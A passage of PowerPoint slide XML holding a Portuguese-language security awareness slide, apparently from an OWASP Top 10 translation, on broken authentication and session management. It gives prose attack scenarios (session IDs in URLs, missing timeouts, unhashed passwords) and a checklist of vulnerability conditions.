                        <a:t> as contas sejam atacadas. Uma vez bem sucedido, o atacante pode fazer qualquer coisa que a vítima faria. Contas privilegiadas são</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>alvos frequentes.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor de negócio dos dados ou funções</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> da aplicação afetados</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Também considere o impacto no negócio através da exposição pública da vulnerabilidade.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3382963" cy="27432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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenários </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário # 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aplicação de reservas de passagens aéreas suporta reescrita de URL, colocando IDs de sessão na URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com/sale/saleitems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;jsessionid=2P0OC2JSNDLPSKHCJUN2JV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?dest=Hawaii</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Um usuário autenticado do site quer deixar seus amigos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saberem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sobre a venda. Ele envia um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do link acima sem saber que com isso também está enviando a sua ID da sessão. Quando seus amigos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilizarem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, irão usar sua sessão e cartão de crédito.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário # 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tempo de expiração </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>da aplicação </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>não está definido </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>corretamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. O usuário utiliza um computador público para acessar o site. Em vez de selecionar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“logout” o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usuário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simplesmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fecha a aba do navegador e vai embora. O atacante usa o mesmo navegador </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hora mais tarde, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navegador ainda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>está autenticado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário # 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atacante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interno ou externo ganha acesso ao banco de dados de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>senhas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do sistema. Senhas de usuários não estão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilizan-do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash, expondo assim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>todas as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>senhas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usuários </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atacante.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3779912"/>
            <a:ext cx="3382963" cy="2544688"/>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1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerável?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Os ativos de gerenciamento de sessão, como credenciais do usuário e IDs de sessão, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>são protegidos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adequadamente? Você pode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>estar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerável se:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As credenciais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de autenticação de usuário não estão protegidas utilizando hash ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>criptografia, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quando armazenadas. Ver A6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As credenciais podem ser descobertas através </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de fracas funções </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de gerenciamento de contas (por exemplo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>criação de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conta, alteração de senha, recuperação de senha, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de sessão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fracos).</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs de sessão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>são </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expostos na URL (por exemplo, reescrita de URL).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs de sessão são vulneráveis ​​a ataques de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>fixação de sessão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs de sessão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>não expiram, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou sessões de usuário ou tokens de autenticação, particularmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aqueles baseados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>em single sign-on (SSO), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e não </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>são devidamente invalidados durante o logout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDs de sessão não são </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rotacionados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>após o login bem-sucedido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
